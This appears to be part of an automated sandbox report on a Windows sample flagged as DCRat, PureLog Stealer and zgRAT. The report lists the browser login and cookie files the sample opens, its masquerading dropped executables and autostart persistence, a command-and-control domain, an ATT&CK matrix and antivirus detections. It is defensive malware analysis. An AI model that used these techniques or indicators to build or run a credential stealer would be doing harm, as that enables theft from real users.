                              Source: upfc.exe, 00000011.00000002.2507201386.000000001315A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                              Source: w32tm.exe, 00000025.00000002.1348768442.00000193F56B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                              Source: vbwUCvifDl.17.drBinary or memory string: outlook.office.comVMware20,11696501413s
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, upfc.exe.0.dr, llflCdrMcgGB.exe.0.dr, llflCdrMcgGB.exe0.0.dr, StartMenuExperienceHost.exe.0.dr, upfc.exe0.0.drBinary or memory string: Py2SvhiHGfsrxCC8JlZ5
                              Source: vbwUCvifDl.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                              Source: vbwUCvifDl.17.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                              Source: vbwUCvifDl.17.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                              Source: vbwUCvifDl.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: global block list test formVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                              Source: vbwUCvifDl.17.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1311821217.000000001B853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: vbwUCvifDl.17.drBinary or memory string: discord.comVMware20,11696501413f
                              Source: vbwUCvifDl.17.drBinary or memory string: AMC password management pageVMware20,11696501413
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess token adjusted: Debug
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess token adjusted: Debug
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\upfc.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\upfc.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeQueries volume information: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe VolumeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe VolumeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe VolumeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe PID: 7704, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6960, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6764, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe PID: 7704, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6960, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 6764, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\llflCdrMcgGB.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts11
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory115
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		2
                              Obfuscated Files or Information                              		Security Account Manager21
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron411
                              Registry Run Keys / Startup Folder                              		411
                              Registry Run Keys / Startup Folder                              		12
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets131
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467031 Sample: 62b1bf60394248d2c743ec6df09... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 71 podval.top 2->71 75 Snort IDS alert for network traffic 2->75 77 Antivirus detection for dropped file 2->77 79 Antivirus / Scanner detection for submitted sample 2->79 81 15 other signatures 2->81 8 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe 12 38 2->8         started        12 upfc.exe 14 34 2->12         started        15 llflCdrMcgGB.exe 2->15         started        17 5 other processes 2->17 signatures3 process4 dnsIp5 55 C:\Windows\...\llflCdrMcgGB.exe, PE32 8->55 dropped 57 C:\Users\user\Desktop\wlyrJHCD.log, PE32 8->57 dropped 59 C:\Users\user\Desktop\YPnuykix.log, PE32 8->59 dropped 69 12 other malicious files 8->69 dropped 85 Creates an undocumented autostart registry key 8->85 87 Creates autostart registry keys with suspicious names 8->87 89 Creates multiple autostart registry keys 8->89 97 2 other signatures 8->97 19 csc.exe 4 8->19         started        23 csc.exe 4 8->23         started        25 cmd.exe 8->25         started        33 2 other processes 8->33 73 podval.top 188.114.97.3, 49707, 49710, 49711 CLOUDFLARENETUS European Union 12->73 61 C:\Users\user\Desktop\rUKsZmvt.log, PE32 12->61 dropped 63 C:\Users\user\Desktop\jjSkKJFG.log, PE32 12->63 dropped 65 C:\Users\user\Desktop\CUcqaUVf.log, PE32 12->65 dropped 67 C:\Users\user\Desktop\AHphtSeX.log, PE32 12->67 dropped 91 Tries to harvest and steal browser information (history, passwords, etc) 12->91 93 Infects executable files (exe, dll, sys, html) 12->93 27 schtasks.exe 12->27         started        29 schtasks.exe 12->29         started        31 schtasks.exe 12->31         started        35 11 other processes 12->35 95 Multi AV Scanner detection for dropped file 15->95 file6 signatures7 process8 file9 51 C:\Program Files (x86)\...\msedge.exe, PE32 19->51 dropped 83 Infects executable files (exe, dll, sys, html) 19->83 37 conhost.exe 19->37         started        39 cvtres.exe 1 19->39         started        53 C:\Windows\...\SecurityHealthSystray.exe, PE32 23->53 dropped 41 conhost.exe 23->41         started        43 cvtres.exe 1 23->43         started        45 conhost.exe 25->45         started        47 chcp.com 25->47         started        49 w32tm.exe 25->49         started        signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe100%AviraHEUR/AGEN.1323342
                              62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Desktop\FUSHtkHk.log100%AviraHEUR/AGEN.1300079
                              C:\Program Files (x86)\Java\jre-1.8\upfc.exe100%AviraHEUR/AGEN.1323342
                              C:\Recovery\llflCdrMcgGB.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\jjSkKJFG.log100%AviraHEUR/AGEN.1300079
                              C:\Recovery\llflCdrMcgGB.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\PDlWdMMS.log100%AviraTR/PSW.Agent.qngqt
                              C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat100%AviraBAT/Delbat.C
